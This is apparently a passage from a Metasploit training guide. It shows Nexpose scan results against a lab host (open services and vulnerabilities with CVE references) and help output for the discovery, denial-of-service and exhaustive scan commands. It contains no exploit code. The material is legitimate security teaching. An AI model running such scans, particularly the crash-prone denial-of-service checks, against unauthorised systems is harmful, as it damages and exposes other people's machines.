172.16.194.172 25 tcp smtp open Postfix
172.16.194.172 53 tcp dns-tcp open BIND 9.4.2
172.16.194.172 53 udp dns open BIND 9.4.2
172.16.194.172 80 tcp http open Apache 2.2.8
172.16.194.172 111 udp portmapper open
172.16.194.172 111 tcp portmapper open
172.16.194.172 137 udp cifs name service open
172.16.194.172 139 tcp cifs open Samba 3.0.20-Debian
172.16.194.172 445 tcp cifs open Samba 3.0.20-Debian
172.16.194.172 512 tcp remote execution open
172.16.194.172 513 tcp remote login open
172.16.194.172 514 tcp remote shell open
172.16.194.172 1524 tcp ingreslock (ingres) open
172.16.194.172 2049 tcp nfs open
172.16.194.172 2049 udp nfs open
172.16.194.172 3306 tcp mysql open MySQL 5.0.51a
172.16.194.172 5432 tcp postgres open
172.16.194.172 5900 tcp vnc open
172.16.194.172 6000 tcp xwindows open
172.16.194.172 8180 tcp http open Tomcat
172.16.194.172 41407 udp status open
172.16.194.172 44841 tcp mountd open
172.16.194.172 47207 tcp nfs lockd open
172.16.194.172 48972 udp nfs lockd open
172.16.194.172 51255 tcp status open
172.16.194.172 58769 udp mountd open

msf > vulns
[*] Time: 2012-06-20 16:34:21 UTC Vuln: host=172.16.194.172 name=NEXPOSE-cifs-nt-0001 refs=CVE-1999-0519,URL-http://www.hsc.fr/ressources/presentations/null_sessions/
[*] Time: 2012-06-20 16:34:21 UTC Vuln: host=172.16.194.172 name=NEXPOSE-generic-ip-source-routing-enabled refs=BID-646,CVE-1999-0510,CVE-1999-0909,MSB-MS99-038,URL-http://packetstormsecurity.nl/advisories/nai/nai.99-09-20.windows_ip_source_routing
[*] Time: 2012-06-20 16:34:21 UTC Vuln: host=172.16.194.172 name=NEXPOSE-unix-hosts-equiv-allows-access refs=
[*] Time: 2012-06-20 16:34:21 UTC Vuln: host=172.16.194.172 name=NEXPOSE-cifs-share-world-writeable refs=CVE-1999-0520

…snip…

[*] Time: 2012-06-20 16:34:22 UTC Vuln: host=172.16.194.172 name=NEXPOSE-vnc-password-password refs=
[*] Time: 2012-06-20 16:34:22 UTC Vuln: host=172.16.194.172 name=NEXPOSE-apache-tomcat-default-password refs=BID-38084,CVE-2009-3843,CVE-2010-0557
[*] Time: 2012-06-20 16:34:22 UTC Vuln: host=172.16.194.172 name=NEXPOSE-apache-tomcat-example-leaks refs=
[*] Time: 2012-06-20 16:34:22 UTC Vuln: host=172.16.194.172 name=NEXPOSE-apache-tomcat-default-install-page refs=
[*] Time: 2012-06-20 16:34:22 UTC Vuln: host=172.16.194.172 name=NEXPOSE-nfs-mountd-0002 refs=

Other types of scans can be conducted against a target, or targets, by using the ‘nexpose_discover’, ‘nexpose_dos’ and ‘nexpose_exhaustive’ commands. The first performs a minimal service discovery scan, as the other will add denial of service checking. Caution should be used when running the ‘nexpose_dos’, as it may very well crash your target. The ‘nexpose_exhaustive’ scan will cover all TCP ports and all authorized safe checks.

msf > nexpose_discover -h
Usage: nexpose_scan [options]

OPTIONS:

-E Exclude hosts in the specified range from the scan
-I Only scan systems with an address within the specified range
-P Leave the scan data on the server when it completes (this counts against the maximum licensed IPs)
-c Specify credentials to use against these targets (format is type:user:pass
-d Scan hosts based on the contents of the existing database
-h This help menu
-n The maximum number of IPs to scan at a time (default is 32)
-s The directory to store the raw XML files from the Nexpose instance (optional)
-t The scan template to use (default:pentest-audit options:full-audit,exhaustive-audit,discovery,aggressive-discovery,dos-audit)
-v Display diagnostic information about the scanning process

msf > nexpose_dos -h
Usage: nexpose_scan [options]

OPTIONS:

-E Exclude hosts in the specified range from the scan
-I Only scan systems with an address within the specified range
-P Leave the scan data on the server when it completes (this counts against the maximum licensed IPs)
-c Specify credentials to use against these targets (format is type:user:pass
-d Scan hosts based on the contents of the existing database
-h This help menu
-n The maximum number of IPs to scan at a time (default is 32)
-s The directory to store the raw XML files from the Nexpose instance (optional)
-t The scan template to use (default:pentest-audit options:full-audit,exhaustive-audit,discovery,aggressive-discovery,dos-audit)
-v Display diagnostic information about the scanning process

msf > nexpose_exhaustive -h
Usage: nexpose_scan [options]

OPTIONS:

-E Exclude hosts in the specified range from the scan
-I Only scan systems with an address within the specified range
-P Leave the scan data on the server when it completes (this counts against the maximum licensed IPs)
-c Specify credentials to use against these targets (format is type:user:pass
-d Scan hosts based on the contents of the existing database
-h This help menu
-n The maximum number of IPs to scan at a time (default is 32)
-s The directory to store the raw XML files from the Nexpose instance (optional)
-t The scan template to use (default:pentest-audit options:full-audit,exhaustive-audit,discovery,aggressive-discovery,dos-audit)
-v Display diagnostic information about the scanning process

NeXpose and Metasploit integration has improved greatly over time. Running scans directly from the console using all of NeXpose’s features is a great addition to the framework. Also we now have the possibility to correlate our findings against Metasploit’s different modules. This feature is offered using the Community Edition which is discussed in a later module.